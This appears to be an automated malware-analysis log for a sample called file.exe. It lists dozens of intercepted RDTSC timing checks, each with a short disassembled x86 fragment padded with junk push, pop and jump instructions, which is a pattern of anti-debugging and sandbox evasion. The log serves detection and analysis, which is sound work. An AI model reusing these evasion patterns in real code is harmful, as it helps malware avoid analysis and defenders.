Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48D0EF second address: 48D12E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CEC3D4Ah 0x00000008 jmp 00007F7E2CEC3D48h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F7E2CEC3D46h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 490996 second address: 4909AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F7E2CEB1B1Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 41E732 second address: 41E73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49516F second address: 49517E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 494964 second address: 494968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 494968 second address: 494980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F7E2CEB1B18h 0x0000000c pop edx 0x0000000d push ebx 0x0000000e jg 00007F7E2CEB1B1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4955B2 second address: 4955B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4955B8 second address: 4955EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Eh 0x00000007 jo 00007F7E2CEB1B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F7E2CEB1B2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 495B6F second address: 495B79 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7E2CEC3D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499154 second address: 499164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499164 second address: 49916A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49916A second address: 49917E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454EBE second address: 454EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 454EC2 second address: 43D706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d cmc 0x0000000e lea eax, dword ptr [ebp+12479C26h] 0x00000014 jmp 00007F7E2CEB1B1Bh 0x00000019 push eax 0x0000001a pushad 0x0000001b jbe 00007F7E2CEB1B18h 0x00000021 jmp 00007F7E2CEB1B1Eh 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a mov dword ptr [ebp+122D1D3Ch], edx 0x00000030 call dword ptr [ebp+122D3644h] 0x00000036 pushad 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455553 second address: 455561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnc 00007F7E2CEC3D36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4556B9 second address: 4556CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jo 00007F7E2CEB1B16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4556CA second address: 4556EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b jmp 00007F7E2CEC3D42h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4556EF second address: 4556F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455880 second address: 455886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4559D7 second address: 4559DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4559DB second address: 455A5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F7E2CEC3D38h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dx, D26Eh 0x0000002c mov ecx, dword ptr [ebp+122D291Bh] 0x00000032 push 00000004h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F7E2CEC3D38h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+1244E46Eh], esi 0x00000054 cmc 0x00000055 nop 0x00000056 pushad 0x00000057 push ebx 0x00000058 push esi 0x00000059 pop esi 0x0000005a pop ebx 0x0000005b jnp 00007F7E2CEC3D38h 0x00000061 popad 0x00000062 push eax 0x00000063 jng 00007F7E2CEC3D42h 0x00000069 js 00007F7E2CEC3D3Ch 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455E09 second address: 455E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B1Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEB1B1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455E2B second address: 455E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F7E2CEC3D38h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 sbb di, D61Eh 0x0000002a mov dx, 85D8h 0x0000002e push 0000001Eh 0x00000030 mov ecx, ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456132 second address: 45614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jno 00007F7E2CEB1B1Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45614E second address: 456152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 456152 second address: 456169 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B1Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4561C8 second address: 4561D2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4561D2 second address: 45623F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7E2CEB1B16h 0x00000009 js 00007F7E2CEB1B16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+1245F6D2h], ebx 0x0000001b lea eax, dword ptr [ebp+12479C6Ah] 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F7E2CEB1B18h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b push eax 0x0000003c push eax 0x0000003d jmp 00007F7E2CEB1B1Fh 0x00000042 pop eax 0x00000043 mov dword ptr [esp], eax 0x00000046 jbe 00007F7E2CEB1B19h 0x0000004c movsx edx, cx 0x0000004f lea eax, dword ptr [ebp+12479C26h] 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 ja 00007F7E2CEB1B16h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45623F second address: 43E1F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7E2CEC3D49h 0x0000000c jmp 00007F7E2CEC3D43h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov edx, 3F1AE100h 0x0000001a call dword ptr [ebp+122D3E87h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4996AA second address: 4996AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499B12 second address: 499B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F7E2CEC3D36h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499B21 second address: 499B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499C79 second address: 499C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499DDD second address: 499DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499DE1 second address: 499DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499DE5 second address: 499E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499E03 second address: 499E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F7E2CEC3D36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499E1E second address: 499E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 412C2C second address: 412C3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F7E2CEC3D36h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 412C3C second address: 412C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 jo 00007F7E2CEB1B1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 412C55 second address: 412C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F7E2CEC3D49h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CEC3D42h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 412C8D second address: 412C93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49CDD4 second address: 49CDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49CDDA second address: 49CDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49CDE3 second address: 49CDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4162A2 second address: 4162A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4162A7 second address: 4162C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D43h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4162C5 second address: 4162C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4162C9 second address: 4162F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007F7E2CEC3D36h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F860 second address: 49F888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jns 00007F7E2CEB1B16h 0x00000013 jmp 00007F7E2CEB1B24h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F888 second address: 49F88F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49FB0D second address: 49FB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49FB11 second address: 49FB2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CEC3D3Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49FB2E second address: 49FB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49FB32 second address: 49FB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49FB4D second address: 49FB53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6AD1 second address: 4A6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7E2CEC3D36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6AE6 second address: 4A6AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6AEE second address: 4A6AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6E00 second address: 4A6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6F7A second address: 4A6F84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CEC3D50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6F84 second address: 4A6FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7E2CEB1B2Ah 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A72DA second address: 4A72E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD08E second address: 4AD092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD092 second address: 4AD0A8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEC3D36h 0x00000008 jmp 00007F7E2CEC3D3Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABAEC second address: 4ABB02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB02 second address: 4ABB26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 jmp 00007F7E2CEC3D3Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABF27 second address: 4ABF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABF2D second address: 4ABF4B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7E2CEC3D41h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0C7 second address: 4AC0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455BD8 second address: 455C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D2EA4h] 0x0000000d jmp 00007F7E2CEC3D40h 0x00000012 mov ebx, dword ptr [ebp+12479C65h] 0x00000018 jmp 00007F7E2CEC3D45h 0x0000001d add eax, ebx 0x0000001f movzx ecx, ax 0x00000022 nop 0x00000023 jo 00007F7E2CEC3D44h 0x00000029 push eax 0x0000002a push edx 0x0000002b jnp 00007F7E2CEC3D36h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 455C24 second address: 455CAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F7E2CEB1B2Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F7E2CEB1B18h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D2734h] 0x0000002e mov ecx, dword ptr [ebp+122D2C00h] 0x00000034 push 00000004h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F7E2CEB1B18h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7E2CEB1B1Fh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC21B second address: 4AC221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC221 second address: 4AC230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 js 00007F7E2CEB1B16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC230 second address: 4AC245 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jno 00007F7E2CEC3D48h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F7E2CEC3D36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ACDEA second address: 4ACDFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CEB1B16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F7E2CEB1B18h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1F9 second address: 4AF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B18C6 second address: 4B18CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B18CA second address: 4B18E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F7E2CEC3D46h 0x0000000e jmp 00007F7E2CEC3D40h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1A2C second address: 4B1A31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
